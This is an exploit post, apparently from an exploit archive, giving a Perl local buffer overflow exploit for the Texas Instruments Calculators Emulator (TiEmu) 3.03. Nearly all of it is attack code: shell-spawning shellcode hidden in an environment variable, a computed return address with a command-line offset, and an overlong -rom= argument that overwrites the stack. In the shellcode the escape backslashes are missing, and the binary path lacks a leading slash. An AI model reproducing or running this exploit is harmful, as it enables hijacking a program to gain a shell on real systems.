Texas Instruments Calculators Emulator 3.03 Buffer Overflow
Posted on 26 April 2016
#!/usr/bin/perl ################################################################# #This exploit uses command line arguments for different offsets # #So it can be tested on different systems *NIX Flavours # ################################################################# ########################################################################## #Texas Instruments Emulator exploit # #Version: 3.03-nogdb+dfsg-3 # # # #As discussed here previously: https://www.exploit-db.com/exploits/39692/# #And here https://packetstormsecurity.com/files/136679/Texas-Instruments # #-Calculators-Emulator-3.03-nogdb-dfsg-3-Buffer-Overflow.html # # # # EMAIL -> n_a at tutanota.com # # # ########################################################################## $filename = "usr/bin/tiemu"; #path name of the binary $shellcode = "x31xc0x50x68//shx68/binx89xe3x50x53x89xe1x99xb0xb0x0bxcdx80"; #Calculating the return address of our shellcode $ret = 0xbffffffa - length($shellcode) - length($filename); #Try different offsets $offs = $ARGV[0]; print " ***Local Exploit for Texas Instruments Emulator*** "; print " By N_A "; print "Use: $0 Offset "; sleep 1; printf("Ret Shellcode 0x%x ",$ret + $offs); $adr = pack('l', ($ret + $offs)); $buff = 'A' x 96; $buff .= $adr x 6; #Set buffer in local var local($ENV{'NNN'}) = $shellcode; exec("$filename -rom= $buff"); #eof
